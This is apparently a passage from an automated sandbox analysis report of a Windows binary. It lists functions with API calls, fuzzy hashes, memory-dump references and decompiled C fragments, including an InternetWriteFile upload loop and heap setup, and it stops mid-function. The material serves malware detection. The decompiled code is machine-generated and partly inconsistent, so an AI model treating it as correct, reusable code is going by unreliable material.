                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalInitializeSection
                                                                                                        • String ID:
                                                                                                        • API String ID: 1185523453-0
                                                                                                        • Opcode ID: 236414c1bfed70673cf2ca4bd68f76fe47f52e15dc27cbc6c40ed951df9b940d
                                                                                                        • Instruction ID: dce4a58076b1f79dcc68fbb24687161c045465a5dbd90a94269580c4af74cf0e
                                                                                                        • Opcode Fuzzy Hash: 236414c1bfed70673cf2ca4bd68f76fe47f52e15dc27cbc6c40ed951df9b940d
                                                                                                        • Instruction Fuzzy Hash: 8341B170D04249ABCF00EBB9C856BDEBFB4BF19310F04415DE552A72D2DB74AA04CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004DDEF8, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004DDEFF
                                                                                                          • Part of subcall function 004D8737: __EH_prolog3.LIBCMT ref: 004D873E
                                                                                                          • Part of subcall function 004D8737: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000008,004DDF46,?), ref: 004D8775
                                                                                                          • Part of subcall function 004F8985: __EH_prolog3_GS.LIBCMT ref: 004F898C
                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$H_prolog3_QueryValuechar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 2246805832-0
                                                                                                        • Opcode ID: e01bdd55093139f9d3c4456845fd8ddb326082c6f18d471400736d013883d5a4
                                                                                                        • Instruction ID: 6ed7e1eb13f2deb5c84d3cef608bd2f19f6efdf6871414d86584e0a2f72d8771
                                                                                                        • Opcode Fuzzy Hash: e01bdd55093139f9d3c4456845fd8ddb326082c6f18d471400736d013883d5a4
                                                                                                        • Instruction Fuzzy Hash: BC21A070C0514DAADB01EBE8C962BEEBBB89F11308F1040AEE041772C2DB795F09C766
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709858A0, Relevance: 1.5, APIs: 1, Instructions: 44filenetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709858A0(void* _a4, intOrPtr _a8, intOrPtr* _a12) {
				long _v4;
				intOrPtr _v20;
				intOrPtr _t10;
				int _t13;
				intOrPtr _t15;
				void* _t18;
				intOrPtr _t23;
				void* _t25;

				_t10 =  *_a12;
				_t25 = 0;
				if(_t10 == 0) {
					return 0;
				} else {
					_t18 = _a4;
					_t23 = _a8;
					while(1) {
						_v4 = 0;
						_t13 = InternetWriteFile(_t18, _t25 + _t23, _t10 - _t25,  &_v4); // executed
						if(_t13 == 0) {
							break;
						}
						_t15 = _v20;
						if(_t15 != 0) {
							_t25 = _t25 + _t15;
							_t10 =  *_v4;
							if(_t25 < _t10) {
								continue;
							}
						}
						break;
					}
					return _t25;
				}
			}











                                                                                                        0x709858a5
                                                                                                        0x709858a8
                                                                                                        0x709858ac
                                                                                                        0x709858fb
                                                                                                        0x709858ae
                                                                                                        0x709858af
                                                                                                        0x709858bb
                                                                                                        0x709858c0
                                                                                                        0x709858cd
                                                                                                        0x709858d5
                                                                                                        0x709858d9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709858db
                                                                                                        0x709858e1
                                                                                                        0x709858e3
                                                                                                        0x709858e9
                                                                                                        0x709858ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709858ed
                                                                                                        0x00000000
                                                                                                        0x709858e1
                                                                                                        0x709858f6
                                                                                                        0x709858f6

                                                                                                        APIs
                                                                                                        • InternetWriteFile.WININET(00000000,?), ref: 709858D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileInternetWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1927131202-0
                                                                                                        • Opcode ID: 4b69bf8d58c1829e549fb3c1b7478a2fb889ce42c957d069a437a657cfa401f9
                                                                                                        • Instruction ID: 1b01f26de073ab55d89f72850f486323088876d62e1000ae19f4efdfbe833717
                                                                                                        • Opcode Fuzzy Hash: 4b69bf8d58c1829e549fb3c1b7478a2fb889ce42c957d069a437a657cfa401f9
                                                                                                        • Instruction Fuzzy Hash: 64F0F4737043569B8704DE59DD8095BF3ECFB89691F11492EF556D3340D720EC088B61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00502EAD, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 431132790-0
                                                                                                        • Opcode ID: d009356854589c4deb7e3b8a6b6400dada5fdb15853dd0bb422718541a2f8dd8
                                                                                                        • Instruction ID: a6511b989250e932586d4f137ffa7679b783a469f906909701c65ddca75831b9
                                                                                                        • Opcode Fuzzy Hash: d009356854589c4deb7e3b8a6b6400dada5fdb15853dd0bb422718541a2f8dd8
                                                                                                        • Instruction Fuzzy Hash: B8F08C71644206AEEF44AFB5890EB7E3FA8BF58321F500569BA15DA1D1EB74D8009B24
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004BEB0F, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004BEB16
                                                                                                          • Part of subcall function 0040CD04: __EH_prolog3.LIBCMT ref: 0040CD0B
                                                                                                          • Part of subcall function 00405B1B: __EH_prolog3.LIBCMT ref: 00405B25
                                                                                                          • Part of subcall function 00405B1B: __EH_prolog3_catch.LIBCMT ref: 00405B63
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$H_prolog3_catch
                                                                                                        • String ID:
                                                                                                        • API String ID: 1670334802-0
                                                                                                        • Opcode ID: 845d3e9db7928d1c354c010bc77de54c14747b0aa06b29a26c790b7bd04347fc
                                                                                                        • Instruction ID: af61eaa94382c69b3300d68eadf7dc43faa917ba5aca0a2887ff9092679f13c1
                                                                                                        • Opcode Fuzzy Hash: 845d3e9db7928d1c354c010bc77de54c14747b0aa06b29a26c790b7bd04347fc
                                                                                                        • Instruction Fuzzy Hash: 83018B31800249EADF10EFA8C80ABCC7FB0AF00318F144269F455672D2CBB99A448BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B840, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B840() {
				void* _t4;
				void* _t13;

				E7098B7E0();
				_t13 =  *0x7098f6d4; // 0x2e70000
				if(_t13 != 0) {
					E7098B830();
					return 1;
				} else {
					_t4 = HeapCreate(0, 0, 0); // executed
					 *0x7098f6d4 = _t4;
					if(_t4 == 0) {
						E7098B830();
						return 9;
					} else {
						E7098A8C0(_t4);
						E7098B830();
						return 0;
					}
				}
			}





                                                                                                        0x7098b843
                                                                                                        0x7098b848
                                                                                                        0x7098b84e
                                                                                                        0x7098b883
                                                                                                        0x7098b88b
                                                                                                        0x7098b850
                                                                                                        0x7098b853
                                                                                                        0x7098b859
                                                                                                        0x7098b860
                                                                                                        0x7098b875
                                                                                                        0x7098b87d
                                                                                                        0x7098b862
                                                                                                        0x7098b862
                                                                                                        0x7098b867
                                                                                                        0x7098b86f
                                                                                                        0x7098b86f
                                                                                                        0x7098b860

                                                                                                        APIs
                                                                                                          • Part of subcall function 7098B7E0: InterlockedCompareExchange.KERNEL32(7098F6D0,00000001,00000000), ref: 7098B7F2
                                                                                                          • Part of subcall function 7098B7E0: Sleep.KERNEL32(00000001,00000000), ref: 7098B80B
                                                                                                          • Part of subcall function 7098B7E0: InterlockedCompareExchange.KERNEL32(7098F6D0,00000001,00000000), ref: 7098B817
                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000100,709891A4,?,?,?,?,?,?,?,?,00000001,4B4CA51F), ref: 7098B853
                                                                                                          • Part of subcall function 7098B830: InterlockedExchange.KERNEL32(7098F6D0,00000000), ref: 7098B837
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ExchangeInterlocked$Compare$CreateHeapSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1766302375-0
                                                                                                        • Opcode ID: c8f09efaa1728e4c0c2f1e38150097630115500ddf3015fcbebd35cebe2db053
                                                                                                        • Instruction ID: 8cfaf80aac167519f23f06719f83f771fcd2ef9b25b22b04b4c28a87b57cdf95
                                                                                                        • Opcode Fuzzy Hash: c8f09efaa1728e4c0c2f1e38150097630115500ddf3015fcbebd35cebe2db053
                                                                                                        • Instruction Fuzzy Hash: 8DE04632A191384BD651B7F9780678E261C9F016A9F09007AF809827E0EA249C4293E3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0049B3B4, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B3BB
                                                                                                          • Part of subcall function 0049B386: __EH_prolog3.LIBCMT ref: 0049B38D
                                                                                                          • Part of subcall function 004805F4: _memset.LIBCMT ref: 004805FE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1193784468-0
                                                                                                        • Opcode ID: 7a00c38c1697e14a8db2f63ebba3d166581996de968a58b258a2552dee80f2c6
                                                                                                        • Instruction ID: fa9d04b3dbe53ae86735a311f774f0395b11d0f6df2606da8e53882a1c4cb9d6
                                                                                                        • Opcode Fuzzy Hash: 7a00c38c1697e14a8db2f63ebba3d166581996de968a58b258a2552dee80f2c6
                                                                                                        • Instruction Fuzzy Hash: 12F0153291001AEFDF16AF90CC0AAADBF72FF04324F108419B6156A1A2EB366924DF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004F6CA2, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004F6CA9
                                                                                                          • Part of subcall function 0049B3B4: __EH_prolog3.LIBCMT ref: 0049B3BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 431132790-0
                                                                                                        • Opcode ID: 73dcc7ed5b3f9acbad9e827884caf8eed8379ba8a3136fde149364911565cdbf
                                                                                                        • Instruction ID: 6ba64deeddd1ae59ad76063fce4da21002f6feec93b56d55d08becc609e30086
                                                                                                        • Opcode Fuzzy Hash: 73dcc7ed5b3f9acbad9e827884caf8eed8379ba8a3136fde149364911565cdbf
                                                                                                        • Instruction Fuzzy Hash: D8E0C2B09006299BDF21BF54880574CBE31FF44731F10421EFA54672C1CB780B00CB88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004B9387, Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004B93A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleInternet
                                                                                                        • String ID:
                                                                                                        • API String ID: 1081599783-0
                                                                                                        • Opcode ID: 62d1d8e80c1d42f9567bc01c2eff2b96fa6d66a9f9cf5245e05d61006443d228
                                                                                                        • Instruction ID: be48d853e61d751395bcb1c43f93eaa7e6359bbeeff9718be07326a7be7b9600
                                                                                                        • Opcode Fuzzy Hash: 62d1d8e80c1d42f9567bc01c2eff2b96fa6d66a9f9cf5245e05d61006443d228
                                                                                                        • Instruction Fuzzy Hash: AAD09E755142119BDB209F58E844B9673E8AF44751B11480DE5C0D7251C778EC418B54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0049B386, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B38D
                                                                                                          • Part of subcall function 0049B32E: __EH_prolog3.LIBCMT ref: 0049B335
                                                                                                          • Part of subcall function 0049B32E: CryptGenRandom.ADVAPI32(?,?,?,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?,0000000C,004F6CCF,?,?), ref: 0049B348
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CryptRandom
                                                                                                        • String ID:
                                                                                                        • API String ID: 232134827-0
                                                                                                        • Opcode ID: d1d0fdfb33de7c295a2f338b3decfc640717fa600d2288fbf1f61d6a3e57e5fa
                                                                                                        • Instruction ID: bf56014202067d8055c103ed3f8baa7151a3cdec1537bc46ceae62ec0e038ae6
                                                                                                        • Opcode Fuzzy Hash: d1d0fdfb33de7c295a2f338b3decfc640717fa600d2288fbf1f61d6a3e57e5fa
                                                                                                        • Instruction Fuzzy Hash: F9D0C97480011AEADF01EFD4C91ABADBF71FF44308F408428B614AA292CB755A08DF55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004D82A9, Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegCloseKey.KERNEL32(?,?,004C2136,?,008326C4), ref: 004D82AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: da5f33b3cf6d96f551713abdd59cbd5d0860e8efd2832817ac9cade17e9be35a
                                                                                                        • Instruction ID: 69603484279da66ae7ba95a0f5b7a5d0fecd8c781cd9d1ea75d222655bde9f33
                                                                                                        • Opcode Fuzzy Hash: da5f33b3cf6d96f551713abdd59cbd5d0860e8efd2832817ac9cade17e9be35a
                                                                                                        • Instruction Fuzzy Hash: B0B092320246208BE7351F06F8497D2B7B5AB20222F01065AE0424A571D6AA6DDA9BD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A910, Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098A910() {
				void* _t7;
				intOrPtr* _t8;
				void _t9;
				void* _t11;

				_t7 =  *0x7098f6ec; // 0x2d30000
				if(_t7 == 0) {
					L4:
